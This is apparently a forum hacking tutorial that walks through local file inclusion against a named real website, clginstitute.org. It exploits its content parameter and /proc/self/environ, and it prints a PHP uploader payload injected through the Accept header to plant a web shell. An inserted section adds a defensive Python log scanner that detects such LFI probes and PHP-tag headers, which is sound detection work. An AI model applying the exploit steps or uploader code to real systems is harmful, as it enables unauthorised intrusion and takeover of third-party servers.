Shell Uploading Using LFI by Mr.Cyb3rWarrior (Adesh kolte)





Today I Show How To Hack A Website Using LFI:- Please Do Not Deface This

Target Site:- http://www.clginstitute.org

Step:1 Find The LFI Target Point On This Website:-

Target LFI Point:-

http://www.clginstitute.org/?content=newsandevent.php



Step:2 Now Remove All Text After The (./?content=). The URL Now Looks Like This:-

http://www.clginstitute.org/?content=



Step:3 Put A Forward Slash After The (./?content=). The URL Now Looks Like This:-

http://www.clginstitute.org/?content=/

If You Get Any Error After Putting The (/), Then The Chance That The Site Is Vulnerable To LFI Is 80%. If You See That Data Is Hidden On The Website, Then The Chance That It Is Vulnerable To LFI Is 50-50%.

Here Is The Error Shown On The Website After Putting (/):



Warning: include(/): failed to open stream: No such device in /home/clginsti/public_html/callpage.php on line 9



Warning: include(): Failed opening '/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/clginsti/public_html/callpage.php on line 9











Step:4 Put This Path After The (./?content=): /proc/self/environ. The URL Now Looks Like This:-

http://www.clginstitute.org/?content=/proc/self/environ

After Putting /proc/self/environ, Some Session Request Is Shown On The Website. That Means We Are Able To Upload Our Shell.





Step:5 Open Tamper Data (Mozilla Add-on), Start Tampering The Data, And Refresh The Target URL:-



Step:6 Put Your Uploader Code In Tamper Data On The User_code Or Accept. I Put My Uploader Code On The Accept.

And Submit The Request.

Uploader Code:-







<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>



Step:7 Now You See Our Uploader On The Website. Here Upload Your Shell And Submit Your Request In Tamper Data.

Step:8 Now Again Put Your Uploader Code On The Accept, Using Tamper Data During The Shell Uploading Time.

Step:9 Your Shell Got Uploaded On The Server. Check It Now.
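
Seen from the server side, the steps above leave a recognisable trail in the web access log. The following is an added example, not part of the original tutorial: a Python scan of combined-format log lines that flags the content parameter being pointed at an absolute path or /proc, and PHP tags in logged request headers. The log lines, function names and reason labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" log format; only the fields used below are named.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
INCLUDE_PARAM = "content"  # parameter name taken from the URLs on this page

SAMPLE_LOG = [  # constructed lines (documentation IP ranges), not real traffic
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /?content=newsandevent.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /?content=/ HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] '
    '"GET /?content=%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 900 "-" "<?php /* placeholder */ ?>"',
]

def path_findings(value):
    """Reasons why an include-parameter value looks like an LFI probe."""
    value = unquote(value)  # second decode exposes double-encoded input
    reasons = []
    if value.startswith("/"):
        reasons.append("absolute-path")
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")
    if re.match(r"/+proc/", value):
        reasons.append("procfs")
    return reasons

def scan_line(line):
    """Return (client_ip, sorted reasons) for a suspicious line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    reasons = set()
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for value in params.get(INCLUDE_PARAM, []):
        reasons.update(path_findings(value))
    if PHP_TAG_RE.search(m["referer"]) or PHP_TAG_RE.search(m["agent"]):
        reasons.add("php-in-header")
    return (m["ip"], sorted(reasons)) if reasons else None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]
```

The Accept header used in Step 6 is not recorded by the combined log format, so catching that variant needs a custom log format or a request-inspection rule in front of the application.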



Thanks For Seeing My Tutorials. Please Post Your Positive Comment If You Learn Something New.

And Also Post Your Web Hacking Tutorials In The Forum.

By Mr.Cyb3rWarrior (Adesh kolte)